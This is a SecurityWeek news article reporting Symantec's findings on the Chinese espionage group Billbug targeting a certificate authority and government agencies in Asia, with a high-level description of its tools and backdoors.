Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cyberwarfare

Chinese Cyberespionage Group ‘Billbug’ Targets Certificate Authority

A Chinese state-sponsored cyberespionage group tracked as Billbug has been observed targeting a certificate authority in Asia, along with other entities, Symantec reports.

A Chinese state-sponsored cyberespionage group tracked as Billbug has been observed targeting a certificate authority in Asia, along with other entities, Symantec reports.

Also tracked as Lotus Blossom and Thrip, Billbug is an advanced persistent threat (APT) actor mainly targeting entities in Southeast Asia and the United States. It’s believed to have been active since at least 2009.

Starting March 2022, the group has been targeting multiple entities in Asia, including a certificate authority, a government organization, and defense agencies.

“The targeting of a certificate authority is notable, as if the attackers were able to successfully compromise it to access certificates they could potentially use them to sign malware with a valid certificate, and help it avoid detection on victim machines. It could also potentially use compromised certificates to intercept HTTPS traffic,” Symantec notes.

According to the security company, however, there is no evidence to suggest that the threat actor has managed to successfully compromise digital certificates.

As part of the observed attacks, the APT used multiple public tools and custom malware, including AdFind, Certutil, NBTscan, Ping, Port Scanner, Route, Stowaway Proxy Tool, Tracert, Winmail, and WinRAR, as well as the Hannotog and Sagerunex backdoors identified in 2019.

The Hannotog backdoor, Symantec explains, can update firewall settings, create a service for persistence, stop running services, upload encrypted data, harvest system information, and download files to the machine.

The Sagerunex backdoor, which uses multiple methods of communication with the command and control (C&C) server, supports commands to list running proxies, execute programs, steal files or drop files, and get configured file paths.

Advertisement. Scroll to continue reading.

“While we do not see data being exfiltrated in this campaign, Billbug is widely regarded as being an espionage actor, indicating that data theft is the most likely motivation in this campaign. The victims in this campaign – government agencies and a certificate authority – also point to an espionage and data-theft motive,” Symantec notes.

The cybersecurity firm also points out that the threat actor likely targeted government victims for espionage purposes, and likely hit the certificate authority to steal legitimate digital certificates.

“This is potentially very dangerous, as if Billbug is able to sign its malware with a valid digital certificate it may be able to bypass security detections on victim machines. The ability of this actor to compromise multiple victims at once indicates that this threat group remains a skilled and well-resourced operator that is capable of carrying out sustained and wide-ranging campaigns,” Symantec concludes.

Related: New Chinese Cyberespionage Group WIP19 Targets Telcos, IT Service Providers

Related: Chinese Cyberespionage Group ‘Witchetty’ Updates Toolset in Recent Attacks

Related: Chinese Threat Actors Exploiting ‘Follina’ Vulnerability

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Cyberwarfare

WASHINGTON - Cyberattacks are the most serious threat facing the United States, even more so than terrorism, according to American defense experts. Almost half...

Cyberwarfare

Russian espionage group Nomadic Octopus infiltrated a Tajikistani telecoms provider to spy on 18 entities, including government officials and public service infrastructures.

Cybercrime

Patch Tuesday: Microsoft calls attention to a series of zero-day remote code execution attacks hitting its Office productivity suite.

Cyberwarfare

Several hacker groups have joined in on the Israel-Hamas war that started over the weekend after the militant group launched a major attack.

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...

Cyberwarfare

The war in Ukraine is the first major conflagration between two technologically advanced powers in the age of cyber. It prompts us to question...

Cybercrime

On the first anniversary of Russia’s invasion of Ukraine, cybersecurity companies summarize the cyber operations they have seen and their impact.

Application Security

Fortinet on Monday issued an emergency patch to cover a severe vulnerability in its FortiOS SSL-VPN product, warning that hackers have already exploited the...